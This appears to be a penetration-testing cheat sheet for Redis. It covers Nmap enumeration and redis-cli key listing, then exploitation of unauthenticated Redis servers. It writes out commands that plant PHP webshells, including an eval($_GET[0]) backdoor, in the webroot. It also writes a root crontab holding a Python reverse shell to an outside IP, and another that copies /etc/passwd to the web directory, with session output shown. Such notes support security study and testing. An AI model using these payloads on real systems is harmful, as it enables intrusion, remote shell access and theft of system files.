Redis is an in-memory data structure store, used as a database, cache and message broker. It usually uses a plain-text based protocol, but can also implement SSL/TLS.
Hydra supports Redis.
Nmap scripts
ls -la /usr/share/nmap/scripts/redis*IP=x.x.x.x
nmap --script redis-info -sV -p 6379 $IPOn the server
Instance version
redis-server --versionRedis Client
redis-cliredis-cli -h <hostname>This message means that you need valid credentials to access the Redis instance.
-NOAUTH Authentication required.Commands within the Redis client
Look under the “Keyspace” section to find available databases.
infoclient listconfig get *Assuming database ID is 1 (see Keyspace section of “info” command)
SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]Webshell
You need the webroot path.
- /usr/share/nginx/html
- /var/www/html
redis-cli -h $IP
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
saveredis-cli -h $IP
config set dir /var/www/html
config set dbfilename sh.php
set payload '<?php eval($_GET[0]);?>'
bgsaveReverse shell crontab
Not working for now
For Ubuntu and Centos, path is /var/spool/cron/
echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OKKALI=x.x.x.x
IP=y.y.y.yecho -e "\n\n* * * * * cp /etc/passwd /var/www/html/passwd\n\n"|redis-cli -h $IP -x set 1
OK
redis-cli -h $IP config set dir /var/spool/cron/crontabs/
OK
redis-cli -h $IP config set dbfilename root
OK
redis-cli -h $IP save
OK